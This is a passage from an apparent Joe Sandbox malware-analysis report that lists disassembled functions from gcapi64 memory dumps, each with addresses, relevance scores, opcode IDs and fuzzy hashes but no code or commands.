                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 517d96c9f3359f53fb8d4c1378b0d3b313e84b2d95ae71b59ec5a02e4cb3c2e3
                                                                  • Instruction ID: f2baea7cd81cd9fd4366c28a6b6bc0a82f965ef38d315cd62ba030f09956d24a
                                                                  • Opcode Fuzzy Hash: 517d96c9f3359f53fb8d4c1378b0d3b313e84b2d95ae71b59ec5a02e4cb3c2e3
                                                                  • Instruction Fuzzy Hash: DC51E320B09A0D0BE7A89B6984A577977C2FF99340F55817DD8CFC72E3CD6CA9464284
                                                                  Function 00007FFD9BA08AF8 Relevance: .2, Instructions: 178COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4b2c91b4672d9b7014090f5f3c4971cfb0add1e0a3ff55f3af78cc3defdc12dd
                                                                  • Instruction ID: 6a94e4674d37193d427820ec73a782daac7e38692c3dc5ba9581789968f76c9b
                                                                  • Opcode Fuzzy Hash: 4b2c91b4672d9b7014090f5f3c4971cfb0add1e0a3ff55f3af78cc3defdc12dd
                                                                  • Instruction Fuzzy Hash: C3510330A2DA4E5BD368DB58C4A5AB6B3E1FF95300F40457DE8CEC3196DE64B9128782
                                                                  Function 00007FFD9BA09FC8 Relevance: .2, Instructions: 176COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 590e9b577d406cf49d380f4c50500139349dc43bddb5b86389b30ff71f06b881
                                                                  • Instruction ID: 5eca66693d4fd773f673be04aa272b9b7bf4db82b85b0fe1e121c8b4f0896f1b
                                                                  • Opcode Fuzzy Hash: 590e9b577d406cf49d380f4c50500139349dc43bddb5b86389b30ff71f06b881
                                                                  • Instruction Fuzzy Hash: B3418231B0DD1C5FDBA4EBACD465AAD77E1EF59310F4501AAE04DD32A6CE65AC018780
                                                                  Function 00007FFD9BA136CB Relevance: .2, Instructions: 176COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 294e1220d52e7ea5bfce381627f6d32c1c10499b307b8047e7a3f51eacccb16a
                                                                  • Instruction ID: c279babb50a52224073579c771c97ea3da9b92d78919b9647bb19a33eabbc23c
                                                                  • Opcode Fuzzy Hash: 294e1220d52e7ea5bfce381627f6d32c1c10499b307b8047e7a3f51eacccb16a
                                                                  • Instruction Fuzzy Hash: 71518AB1B1EA8E1FE7F4DF5C98665A477E0FF58301B0501BAE44DC72B2DA58AD068381
                                                                  Function 00007FFD9BA0FB90 Relevance: .2, Instructions: 175COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1440c01984ad639625d4e63068fef34bac369300139889cff402694094eb65d1
                                                                  • Instruction ID: 0eece15b3d91d50d4da059571495295955c0276727c4f34ff7c0da66644662fe
                                                                  • Opcode Fuzzy Hash: 1440c01984ad639625d4e63068fef34bac369300139889cff402694094eb65d1
                                                                  • Instruction Fuzzy Hash: BB51377160EBC94FD775DB6884275657BE0EF57300F1504FEC4CACB1A2DA68680AC381
                                                                  Function 00007FFD9BA1D1F4 Relevance: .2, Instructions: 175COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b6a7ae66b5132d47cccac779f7b02f2660fa2c30e6083822d096e7e7eadd939b
                                                                  • Instruction ID: d6a18e0dfaac67ea8b789bc163f1c286118025341c1cf9ae91892196e9fd373a
                                                                  • Opcode Fuzzy Hash: b6a7ae66b5132d47cccac779f7b02f2660fa2c30e6083822d096e7e7eadd939b
                                                                  • Instruction Fuzzy Hash: 54510531A0A64D8FDB51EF68C8646EE7BB1FF5A310F0501BBE408D72A6CB75A805C790
                                                                  Function 00007FFD9B6D0315 Relevance: .2, Instructions: 166COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6a4dd710b5fc8eefce0b90a073feb2904362cfa790273fc0f567234d1a02092f
                                                                  • Instruction ID: fa77beaad2099e9f8296c085553bac5211bc9654fb4c8a88a3f4fa267c6cc94e
                                                                  • Opcode Fuzzy Hash: 6a4dd710b5fc8eefce0b90a073feb2904362cfa790273fc0f567234d1a02092f
                                                                  • Instruction Fuzzy Hash: 7651B532A0964E9FDB51EF68E8556ED7BA0FF44314F5101BAE42CCA1E2DF34A154C781
                                                                  Function 00007FFD9BA0FBD1 Relevance: .2, Instructions: 161COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3b5e179a9738af4a3c84c7652f2e0381c072d6d29086c8f051fb098f1dd79151
                                                                  • Instruction ID: 2cba6f156e4c56942e05a15144f45a2cf380a1891d8d442cb7474589ee64416e
                                                                  • Opcode Fuzzy Hash: 3b5e179a9738af4a3c84c7652f2e0381c072d6d29086c8f051fb098f1dd79151
                                                                  • Instruction Fuzzy Hash: 6E513C71A1EB8A4FD778DB6884275657BE0FF57300F1504BEC8CEC71B2DA69A90A8341
                                                                  Function 00007FFD9BA0472E Relevance: .2, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3942a33fc2067b65d189c156fb171bd7e2ead5dd267f8a56787bb22cee97b79d
                                                                  • Instruction ID: 63b665bd2575048278333dcf9590149eeec2251e7b1c1330ab3d7fb68fb9f20c
                                                                  • Opcode Fuzzy Hash: 3942a33fc2067b65d189c156fb171bd7e2ead5dd267f8a56787bb22cee97b79d
                                                                  • Instruction Fuzzy Hash: 9E41BE7060D78C4FEB689F5C94656B97BE1FF9A310F15017EE4CAC32A2CE65E8428781
                                                                  Function 00007FFD9BA06CB5 Relevance: .2, Instructions: 150COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 41f1a86f2045d78649abd29fca6c62bceac9648047d5541062f77dc1a33c2647
                                                                  • Instruction ID: e4925c6a2ec759aa974259b13da0b6bff925fd5c65e98dc88eadd6f88dd33d16
                                                                  • Opcode Fuzzy Hash: 41f1a86f2045d78649abd29fca6c62bceac9648047d5541062f77dc1a33c2647
                                                                  • Instruction Fuzzy Hash: 6741F630B1DB4D0FE6A8A74C9461BB973D1EF99700F45017ED48DC32D6CE64E8018386
                                                                  Function 00007FFD9B791678 Relevance: .1, Instructions: 148COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d0f85234d39afdcd3560a0ebfb90c455bdc15989f6818ed328aca588d2226c58
                                                                  • Instruction ID: de709776c37ddbd467f06d2595b58aa7b03adf643585536697173d53d3f918a3
                                                                  • Opcode Fuzzy Hash: d0f85234d39afdcd3560a0ebfb90c455bdc15989f6818ed328aca588d2226c58
                                                                  • Instruction Fuzzy Hash: 5341F422F0FB8B1FF7B5AAA848B51B876D1EF55250B0A01BAE15EC75F3DD286C508300
                                                                  Function 00007FFD9BA0ED39 Relevance: .1, Instructions: 142COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e49d3dfc453c20406a408c01d338426caead5a6b1e01b2f01fb3760738785c31
                                                                  • Instruction ID: ea1eb7242a9ef8b29ab0e1480c03097fca7d64ac8bbe30766d1ca3a2edebef65
                                                                  • Opcode Fuzzy Hash: e49d3dfc453c20406a408c01d338426caead5a6b1e01b2f01fb3760738785c31
                                                                  • Instruction Fuzzy Hash: 7F31E221F0EA5E4FEBA5879D587467537C1EFA6204F0A00BAE0CDC72B3DD59AD029341
                                                                  Function 00007FFD9BA112D5 Relevance: .1, Instructions: 133COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3a89c2b3bc75c569e807ef7fc2e6c868586c20490a812dca4ad5ba3b313c8efc
                                                                  • Instruction ID: 0b5e17232eeecae182361450ff44de5c2995d6a7f8b49b1d578558a89407a4d3
                                                                  • Opcode Fuzzy Hash: 3a89c2b3bc75c569e807ef7fc2e6c868586c20490a812dca4ad5ba3b313c8efc
                                                                  • Instruction Fuzzy Hash: B4412270B0991D8FDFE4EB58C8A1BA873E2EF59300F1541A8D04DE76A2CE75AD46CB40
                                                                  Function 00007FFD9BA0EC1C Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f29225994645df23cc553eeab0eed076bb4d72d492916707961e27a8f3262565
                                                                  • Instruction ID: 3b31ef6ff2f78c9c45f985940c3822bbfdea603c2d7c9af2e1a3d902c44ebcc0
                                                                  • Opcode Fuzzy Hash: f29225994645df23cc553eeab0eed076bb4d72d492916707961e27a8f3262565
                                                                  • Instruction Fuzzy Hash: D7410121A1DBC50FD757977888616A17FF0EF57220B0941EBD489CB0E7DD6C680AC312
                                                                  Function 00007FFD9BA0F261 Relevance: .1, Instructions: 130COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 179d1184f88995470111d78b61c344cd959e27f457040154c86f105a05600155
                                                                  • Instruction ID: 0f7a37e4c3a448a24da2b1c5412db222817c73647613b2758af23818380f888e
                                                                  • Opcode Fuzzy Hash: 179d1184f88995470111d78b61c344cd959e27f457040154c86f105a05600155
                                                                  • Instruction Fuzzy Hash: 94318A31A0EA0E4FEBB4DB5CC4666A437D0FF59310F0206B9D4DDD72B1DA5AAD068782
                                                                  Function 00007FFD9BA1D0C0 Relevance: .1, Instructions: 129COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a59f1f5f023069c97cc33cd8e8a16dfdc4338094c6c71d086cf4095ea784fa95
                                                                  • Instruction ID: a89160a7317f74ad192a8b96bca8c458b1946a05ba18f53354c84a9f11d62aa5
                                                                  • Opcode Fuzzy Hash: a59f1f5f023069c97cc33cd8e8a16dfdc4338094c6c71d086cf4095ea784fa95
                                                                  • Instruction Fuzzy Hash: 4F41E171A0965D8FDF95DF58C860AED7BB1FF59310F0201BAE448E72A6DB34A801C790
                                                                  Function 00007FFD9BA00E75 Relevance: .1, Instructions: 128COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 00cbff2d5823fd0e8b1e53c02cf472e9db02e7e1ea8f9ca5476d34dd144171ea
                                                                  • Instruction ID: 1d3611a36294205e501288c98de48d0b24c8fca5349653028311b75808d50d7d
                                                                  • Opcode Fuzzy Hash: 00cbff2d5823fd0e8b1e53c02cf472e9db02e7e1ea8f9ca5476d34dd144171ea
                                                                  • Instruction Fuzzy Hash: FF31493271D94C0FE7A8A7ACAC1A5B537D0EF57721B0101BAE58EC71A3EC56AC434385
                                                                  Function 00007FFD9BA0ACCB Relevance: .1, Instructions: 127COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: aad1197f021975b1815a49885a41eccf90376dc652d789f93e8b26a2d50b28c6
                                                                  • Instruction ID: 63c7e9ed919a20e7f7616ecb37d3ffaef4dfaa0f7febc32e4c8ae0e65c11d7c6
                                                                  • Opcode Fuzzy Hash: aad1197f021975b1815a49885a41eccf90376dc652d789f93e8b26a2d50b28c6
                                                                  • Instruction Fuzzy Hash: 4A410421B0E90E4FEBB4D7ACC4656B877D1EF5A321F1502B9D48EC71E2DD68A9068780
                                                                  Function 00007FFD9BA1409C Relevance: .1, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a9de74881973dca493848cebd43664b4248a2d66e11758dc6822674288899047
                                                                  • Instruction ID: 2956ee1f23a2e8f5cd8b4c51a945089351291b5bee481b5efda4af34582bdfaa
                                                                  • Opcode Fuzzy Hash: a9de74881973dca493848cebd43664b4248a2d66e11758dc6822674288899047
                                                                  • Instruction Fuzzy Hash: BE317C30B1DA4C4FD7D4EB6C84A962977D2EF99700F5500AEE48DC32B2CE64ED418B82
                                                                  Function 00007FFD9BA19FD0 Relevance: .1, Instructions: 125COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f81120fe7446e465da644ccf531b2df10957e0f026c1de100ba778aff1d35b87
                                                                  • Instruction ID: 66b93cdbc5b2a69c4f145da1225daa371ee5b383130a0ae09690fa06dde45b4b
                                                                  • Opcode Fuzzy Hash: f81120fe7446e465da644ccf531b2df10957e0f026c1de100ba778aff1d35b87
                                                                  • Instruction Fuzzy Hash: 7331E631A0EB8E1FE7F9976884766B53BA1EF15300F0510BEC09AC65E3DD69A9868341
                                                                  Function 00007FFD9B6CC1D5 Relevance: .1, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2a1426f06ddaf4ca7abb38347c7e50ce7d311b48790386334b25ef21ceeae9b2
                                                                  • Instruction ID: b00dcb50939753cb54f425297916bf543340f5025a49c3e82823e75b1cca5991
                                                                  • Opcode Fuzzy Hash: 2a1426f06ddaf4ca7abb38347c7e50ce7d311b48790386334b25ef21ceeae9b2
                                                                  • Instruction Fuzzy Hash: 9B310A22B0E9494FE794F7BC94A997837E2EF9525070A00F6E119CF2B3DD19AD428380
                                                                  Function 00007FFD9BA108B2 Relevance: .1, Instructions: 119COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f1ec6dac5bf3225948275ed741eb987244a3fb924e9ebd15a98e06d6121a85fd
                                                                  • Instruction ID: 5a9081863cfb1e11f786a244ae8bc371286501048dd40ae8b49bacae14d1f700
                                                                  • Opcode Fuzzy Hash: f1ec6dac5bf3225948275ed741eb987244a3fb924e9ebd15a98e06d6121a85fd
                                                                  • Instruction Fuzzy Hash: 7C31E521B1E99D4FEBB9EB6C4479B653BD1EF5A700F0600B9E04DC72A3CD58AD428780
                                                                  Function 00007FFD9BA03BAA Relevance: .1, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2b36c30fb99ec081dba1e269fc8a6ad55b055a4f6daa4ea40623976d6a9e65be
                                                                  • Instruction ID: 60c54b3055e90ae88db38aa253cbc77ae990ad45769f97613e40dd9dde226112
                                                                  • Opcode Fuzzy Hash: 2b36c30fb99ec081dba1e269fc8a6ad55b055a4f6daa4ea40623976d6a9e65be
                                                                  • Instruction Fuzzy Hash: B1316B31B08A4E8FEBA4EF68C854AB973E1FF89308F050576E85ED3190DE78E9148741
                                                                  Function 00007FFD9B792086 Relevance: .1, Instructions: 118COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 25942ad640b26beabd268996e7458eae0cfff39a12318109c1bde5f4469741f7
                                                                  • Instruction ID: 3d90b940cc6781e17163705a8c845ea7d1e26dd749ad5a7d5f62413a5291346e
                                                                  • Opcode Fuzzy Hash: 25942ad640b26beabd268996e7458eae0cfff39a12318109c1bde5f4469741f7
                                                                  • Instruction Fuzzy Hash: 1531A322B4FB8A0BFBF9BAEC08B56B875C1AF55250B1901BAD55DC71F3ED186C408341
                                                                  Function 00007FFD9BA08B60 Relevance: .1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ed1337fe57f20cc702dd5e09bb719590fa71745e22d53e7129dfe1b474e8cd17
                                                                  • Instruction ID: c69305ffe9a509f03c57947cef3c737da395b483397c2302cd0cd38da3d07ef5
                                                                  • Opcode Fuzzy Hash: ed1337fe57f20cc702dd5e09bb719590fa71745e22d53e7129dfe1b474e8cd17
                                                                  • Instruction Fuzzy Hash: EA31093070DA4D4FDB94EB6CD4A4AA57BD1EF99320B4501BAE08EC72A7CE24E8418780
                                                                  Function 00007FFD9BA12475 Relevance: .1, Instructions: 114COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2115950308.00007FFD9BA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA00000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9ba00000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0ce968c4c27568f056c9cb2b6dabaaf81468175561c67dab5af69709d023cebd
                                                                  • Instruction ID: c483261b62fa2ee93d6634c05f903846288bca79332be787c082bcc350ab0c24
                                                                  • Opcode Fuzzy Hash: 0ce968c4c27568f056c9cb2b6dabaaf81468175561c67dab5af69709d023cebd
                                                                  • Instruction Fuzzy Hash: D631C43070DA4D4FDB95EB6C94A4A657BE1FF8A310B4501FAE08DC72B2CE69D8428781
                                                                  Function 00007FFD9B6D0375 Relevance: .1, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e80db7a826daca26de8f8185c788ebb5ccfd8ead0c4112d48d56533fbc332ffe
                                                                  • Instruction ID: 3c2280eb520a2ad368a796a22b1548a08085a8f05010ca8d72a35457b9984537
                                                                  • Opcode Fuzzy Hash: e80db7a826daca26de8f8185c788ebb5ccfd8ead0c4112d48d56533fbc332ffe
                                                                  • Instruction Fuzzy Hash: 5C31C531A1964E9EE751FFA8A8596FD7BE0EF44308F0105B6E42CCA0E6DF346194C741
                                                                  Function 00007FFD9B6CC295 Relevance: .1, Instructions: 113COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f0b3988e517b4906663d120bcca617a5d08cfd1fa14e4ed6279f336952265b0
                                                                  • Instruction ID: ed09b1cfe9af0c2afdc0de2da42187cd2c7e8eb914ce2f057c39652e33a762ea
                                                                  • Opcode Fuzzy Hash: 9f0b3988e517b4906663d120bcca617a5d08cfd1fa14e4ed6279f336952265b0
                                                                  • Instruction Fuzzy Hash: 1131D622B0E9494FE798F7BC9469A7877E2EF9A25070600F6D11DCB2B3ED19BC024350
                                                                  Function 00007FFD9B790C92 Relevance: .1, Instructions: 112COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2100797828.00007FFD9B790000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B790000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b790000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5c474edf4802987ee4ffc6d43b03e1f530cbd4f87cb39346ede88ac4b2a63cf6
                                                                  • Instruction ID: 75a24cb8e0c5107c6777895abd29c7e4bfb2a574eb1859dd682648a3fdd2e161
                                                                  • Opcode Fuzzy Hash: 5c474edf4802987ee4ffc6d43b03e1f530cbd4f87cb39346ede88ac4b2a63cf6
                                                                  • Instruction Fuzzy Hash: A1310722F2FB9F0BF7B5966818751B876C1AF52E50B4906BAD4ACC71F3DD086C005381
                                                                  Function 00007FFD9B6C793F Relevance: .1, Instructions: 111COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2098345271.00007FFD9B6C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_7ffd9b6c0000_gcapi64.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e36f5ed6297282ca5ec27d877bbf3db05271e4f8143970c0bf5251918d3c803c
                                                                  • Instruction ID: 60440b86e4011eec8e1e6d3e05ec4702054c4aeadeebe77b7c68e82e7334a8a8
                                                                  • Opcode Fuzzy Hash: e36f5ed6297282ca5ec27d877bbf3db05271e4f8143970c0bf5251918d3c803c
                                                                  • Instruction Fuzzy Hash: F921FB32B1A90D4FE794F7FDA46957867D2EF9925174500B6E21DCB2B3ED15BC024340
                                                                  Function 00007FFD9BA0AAF0 Relevance: .1, Instructions: 110COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
